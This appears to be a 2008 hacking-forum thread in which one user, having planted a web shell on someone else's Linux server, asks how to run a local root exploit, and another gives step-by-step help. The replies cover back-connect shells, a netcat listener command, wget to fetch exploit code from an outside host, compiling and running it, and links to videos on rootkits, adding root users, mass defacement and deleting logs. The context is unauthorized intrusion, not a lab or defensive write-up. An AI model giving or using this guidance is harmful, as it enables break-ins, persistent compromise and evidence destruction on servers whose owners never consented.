 |
|
 |
 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 295
Members: 0
Total: 295
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
locale root exploit |
 |
Posted: Wed Aug 13, 2008 2:42 pm |
|
|
badrh0 |
Active user |

 |
|
Joined: Jul 06, 2008 |
Posts: 32 |
|
|
|
 |
 |
 |
|
hi
please excuse my newbie question
ok, I've uploaded a shell on a Linux 2.4.27 version, so I searched for local root exploit to gain previleges, I found http://www.milw0rm.com/exploits/624 okey, but the problem is that I don't know how to use it, I compiled it and run the executable on the target machine, it displays me "core dumped!" , and now what can I do to root the server ??! |
|
|
|
|
 |
 |
|
 |
Posted: Wed Aug 13, 2008 5:50 pm |
|
|
cO2_dz |
Regular user |

 |
|
Joined: Aug 12, 2008 |
Posts: 10 |
Location: Algeria |
|
|
 |
 |
 |
|
Hi,
You must first of all connect with backconnection to the box. this can done with
two ways if we have the suitable shell.u can use the Back-Connect module of r57/c99 shell
or to upload a backconnector or another one shell in perl/c like back.pl you can find it into tryag.cc
Initially U open NetCat and give to listing in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if u have a router) i mean if you have an ADSL type like Fawri you must opening a port in the router but if you normally have Easy ADSL connexion you can going to those steps,
Now you press in Windows Start -> Run -> and u type: cmd
After you will go to the NetCat directory like c:\nc or C:\Program Files\Netcat
And you type the following command (nc -n -l -v -p 999)
NetCat respond: listening on [any] 999 ...
In the Port form you will put the port that you opened and NetCat listens,If you press connect the shell will respond:
Now script try connect to <IP here> port 11457 ...
If your settings are correct NetCat will give us a shell to the server,Now you wil continue to the Rooting proccess.
Do you know some commands linux.?
for finding a writable folders/files by typing (find / -perm -2 -ls)
To download the local root exploit you can use a download command for linux like wget()
wget http://www.ur-site.com/localroot/kernel-local-2-7.c
for compile the exploit put (gcc kernel.c -o) ,than you u must run the bug by typing (./kernel-local-2-7.c)
don't forget the point ok? XD
wait for second i'll search to u some videos ok? about the rooting server without back.pl
i have help u coz u are from DZ  |
|
|
|
|
 |
 |
|
 |
Posted: Wed Aug 13, 2008 6:13 pm |
|
|
cO2_dz |
Regular user |

 |
|
Joined: Aug 12, 2008 |
Posts: 10 |
Location: Algeria |
|
|
 |
 |
 |
|
Video-I:
1- To connecting through NC[netcat]
Code: | Link : http://www.mlfnt.net/323257 |
Video-II:
1- To root server with a local exploit
2- Add a user with a permission "ROOT" XD
3- Creat a RootKit
4- Connectin through the SSH 'rooting'
Code: | Link : http://www.mlfnt.net/801924 |
Video-III:
1- Open a port And connect through NC[netcat]
Code: | Link : http://www.mediafire.com/?bqwfixymzav |
Video-IIII:
1- Take a ROOT with a Local Cpanel
Code: | Link : http://www.mediafire.com/?0sd20yuwjx0 |
Video-IIIII:
1- Install a RootKit in the server for re-connecting all the time XD
Code: | Link : http://www.mediafire.com/?6tutmmzaae4 |
Video-IIIIII:
1- To Using a Mass Defacement and Deleting ur logs files XD
Code: | Link : http://www.mediafire.com/?1t1t2mlz7sr |
Code: | Infos:
for know if the port of SSH was changed u can go to this directory and . . .
cd /etc/ssh
cat sshd_config |
NOTE : The Defacing is not the real hacking just for remember with all my respects
/cO2 |
|
|
|
|
 |
 |
|
 |
Posted: Sun Dec 07, 2008 2:54 pm |
|
|
cbxm |
Beginner |

 |
|
Joined: Dec 07, 2008 |
Posts: 4 |
|
|
|
 |
 |
 |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|